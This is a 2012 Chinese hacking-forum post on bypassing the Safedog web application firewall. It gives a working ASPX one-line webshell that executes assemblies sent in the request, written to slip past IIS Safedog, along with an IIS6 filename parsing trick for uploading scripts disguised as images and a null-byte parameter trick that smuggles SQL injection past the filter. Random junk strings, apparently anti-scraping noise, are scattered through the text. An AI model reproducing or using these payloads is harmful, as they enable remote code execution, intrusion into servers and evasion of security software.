找回密码
 立即注册
查看: 2857|回复: 0
打印 上一主题 下一主题

突破安全狗防注入及上传的一些思路

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-31 08:25:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、绕过IIS安全狗的一句话。+ _/ F8 ~* c& V8 {$ e3 Q) N1 l
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
0 e  p9 ~, k% t  C: k' [# A& ~* v; @<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。+ R4 v# t3 I! B+ A6 H

# e, U* u' v! `5 V% E2 r2、IIS6.0解析漏洞遇到安全狗。
/ c  X" D7 V) {& B. s# V文件名为
' N3 G: L) S) f$ {$ Z  I! \# T7 `/ ahttp://www.xxxxx.com/sh3llc0de.asp;1.jpg5 e/ \. T/ i1 W8 X2 ]

- V& o* v! j- Z1 U) s这样的会被IIS安全狗果断屏蔽。
" P+ S0 y; m! \  I改成如下名称,IIS6一样会解析:% F" m, l5 h( C
www.xxxxx.com/;1.asp;1.jpg8 N- l1 L8 _" S* P1 J+ ?. W

; I) t7 d6 O& K, r8 [3、安全狗的注入绕过。
4 \: \2 N% D4 x. h  J: m2 k( @' m% T常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。& }8 Q: P$ E8 u& g* j
但如果:
$ b9 z, |0 k( _2 u/ @r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1- V) k# M# o) d  ]; ^: D- D2 M
就可以成功绕过了。, U1 M8 {; w4 u+ {9 E9 z8 D

7 E6 a5 r& a2 |4 N+ L6 `: k8 e  H4 B+ x9 ~# [6 @6 e+ }
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表